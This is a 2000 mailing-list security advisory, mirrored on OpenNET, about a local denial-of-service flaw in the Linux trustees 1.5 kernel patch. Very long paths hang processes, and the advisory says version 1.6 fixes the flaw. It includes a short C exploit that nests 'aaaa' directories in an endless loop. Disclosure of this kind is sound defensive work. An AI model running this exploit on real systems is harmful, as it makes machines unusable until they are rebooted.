The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


linux trustees 1.5 long path name vulnerability


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Mon, 10 Apr 2000 14:20:59 +0400
From: "Andrey E. Lerman" <[email protected]>
To: [email protected]
Subject: linux trustees 1.5 long path name vulnerability

Linux trustees is a kernel patch which provide Netware-like
permissions to linux. It is not in kernel by default.

For more information see project's website at
http://www.braysystems.com/linux/trustees.html

Problem description:
When accessing a file or directory with a very long path the
process hangs in an unkillable state. All other processes are
SEGFAULTing when trying to access unkillable process' /proc
entry. So system utilities ps, w, top, killall and the like are
stoppping working. Except that, the system continues to
function normally. The only solution is reboot.

The only version tested is trustees 1.5 for linux 2.2.14. But
it seems what other versions of linux trustees <1.6 are vulnerable.

I'm not sure if this vulnerability is only local DoS. It may
be possible to overwrite the process' structures in the
kernel, causing privileges elevation. I haven't investigated
that possibility yet, so I may be wrong. Servers with open ftp
incoming directory, nfs or samba shares are at risk too.

Status:
This problem is fixed in linux trustees 1.6, available for
linux 2.2.14 and 2.3.99. Thanks to the author of the package,
Vyacheslav Zavadsky for a quick response.

Exploit:
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>

int main(void)
{

while(1) {
	if(mkdir("aaaa",0777)<0) {
		perror("mkdir");
		exit(1);
		}
	if(chdir("aaaa")<0) {
		perror("chdir");
		exit(1);
		}
	}

return(0);
}
-- END --

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру